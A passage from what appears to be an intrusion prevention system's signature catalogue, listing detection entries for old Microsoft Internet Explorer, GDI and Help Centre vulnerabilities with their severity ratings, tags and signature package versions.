Vulnerability: Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213
Description:
Back to top

HTTP_SS-Microsoft-GDI-Vulnerability-CVE-2009-2501

About this situation: Detects attacks against CVE-2009-2501
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-10, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-258-3038
Last changed: sgpkg-ips-258-3038
Vulnerability: Microsoft-GDI-Vulnerability-CVE-2009-2501
Description:
Back to top

HTTP_SS-Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2011-02, CVE2010, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-368-4219
Vulnerability: Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Help-Centre-Malformed-Escape-Sequence

About this situation: An attempt to exploit a vulnerability in Microsoft's Help Centre Protocol handler was detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, MS2010-07, CVE2010, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-312-4219
Last changed: sgpkg-ips-314-4219
Vulnerability: Microsoft-Help-Centre-Malformed-Escape-Sequence
Description:
Back to top

HTTP_SS-Microsoft-Help-Centre-Protocol-Access

About this situation: An attempt to use Microsoft's Centre Help Protocol handler was detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, MS2010-07, CVE2010, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-312-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Microsoft-Help-Centre-Malformed-Escape-Sequence
Description:
Back to top

HTTP_SS-Microsoft-HtmlDlgHelper-ActiveX-Component-Usage

About this situation: Reference to Microsoft HtmlDlgHelper ActiveX component detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-346-4219
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3329
Description:
Back to top

HTTP_SS-Microsoft-Ie-ActiveX-Object-IObjectsafety-Implementation-Code-Execution

About this situation: Exploit against the tblinf32.dll ActiveX control in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-08, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-118-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Microsoft-Ie-ActiveX-Object-IObjectsafety-Implementation-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure

About this situation: Attempt to exploit an information disclosure vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-06, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-156-2032
Vulnerability: HTTP-Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-CElement-Memory-Corruption

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Microsoft-Internet-Explorer-CElement-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-02, CVE2009, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-206-2032
Last changed: sgpkg-ips-206-2032
Vulnerability: Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption-Exploit

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2009-02, CVE2009, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-208-2032
Last changed: sgpkg-ips-262-3038
Vulnerability: Microsoft-Internet-Explorer-Cloned-Object-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-10, CVE2008, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Microsoft-Internet-Explorer-Createrange-Cross-Domain-Scripting
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Cross-Domain-Disclosure-CVE-2010-3330

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-346-4219
Vulnerability: Microsoft-Internet-Explorer-Cross-Domain-Information-Disclosure-CVE-2010-3330
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243

About this situation: An attempt to exploit a cross-site scripting vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-346-4219
Vulnerability: Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3243
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324

About this situation: An attempt to exploit a cross-site scripting vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-346-4219
Vulnerability: Microsoft-Internet-Explorer-Cross-Site-Scripting-CVE-2010-3324
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-CSS-Strings-Parsing-Memory-Corruption

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-08, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-356-4219
Vulnerability: HTTP_SS-Microsoft-Internet-Explorer-CSS-Strings-Parsing-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption

About this situation: Memory corruption exploit against Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2007-06, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Microsoft-Internet-Explorer-CSS-Tag-Handling-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-365-4219
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-368-4219
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971-3

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-397-4219
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-CVE-2010-3971-4

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-393-4219
Vulnerability: Microsoft-Internet-Explorer-CVE-2010-3971
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Data-Stream-Handling-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-04, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-153-2032
Vulnerability: HTTP-Microsoft-Internet-Explorer-Data-Stream-Handling-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Datasource-Xml-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerablity in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2008-12, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-194-2032
Last changed: sgpkg-ips-194-2032
Vulnerability: Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-10, CVE2009, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: Microsoft-Internet-Explorer-Deflate-Encoding-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Developer-Tools-CVE-2011-0811

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 8.0, MS2011-04, CVE2010, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-386-4219
Vulnerability: Microsoft-Internet-Explorer-Developer-Tools-CVE-2010-0811
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution

About this situation: Detected an attempt access to vulnerable DHTML method
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2005-02, CVE2005, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Internet-Explorer-DHTML-CreateControlRange-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting

About this situation: Attempt to exploit a cross-site scripting vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2005-02, CVE2004, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-188-2032
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Internet-Explorer-DHTML-Edit-Control-Cross-Site-Scripting
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption

About this situation: Detected an attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-12, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Internet-Explorer-DHTML-Objects-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2009-04, CVE2009, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2006-08, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-368-4219
Vulnerability: Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-History.go-Method-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-04, CVE2009, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-330-4219
Vulnerability: Microsoft-Internet-Explorer-History.go-Method-Double-Free-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption

About this situation: Attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-10, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-176-2032
Last changed: sgpkg-ips-176-2032
Vulnerability: Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Element-Memory-Corruption-CVE-2010-3345

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Element-Memory-Corruption-CVE-2010-3345
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, MS2008-12, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-377-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerablity in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2008-12, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-193-2032
Last changed: sgpkg-ips-194-2032
Vulnerability: Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Layout-Memory-Corruption-CVE-2010-2560

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-08, CVE2010, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-329-4219
Last changed: sgpkg-ips-329-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Layout-Memory-Corruption-CVE-2010-2560
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-0248

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-01, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-279-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-0248
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3340

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3340
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3343

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3343
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Objects-Memory-Corruption-CVE-2009-1918

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-07, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-234-3038
Vulnerability: Microsoft-Internet-Explorer-HTML-Objects-Memory-Corruption-CVE-2009-1918
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption-CVE-2010-3346
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Invalid-Pointer-Reference

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-01, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-278-4219
Vulnerability: Microsoft-Internet-Explorer-Invalid-Pointer-Reference
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-293-4219
Last changed: sgpkg-ips-341-4219
Vulnerability: Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-IsComponentInstalled-BOF

About this situation: Detects Microsoft Internet Explorer IsComponentInstalled BOF exploits
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP-Microsoft-Internet-Explorer-IsComponentInstalled-BOF
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-386-4219
Vulnerability: Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-06, CVE2011, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
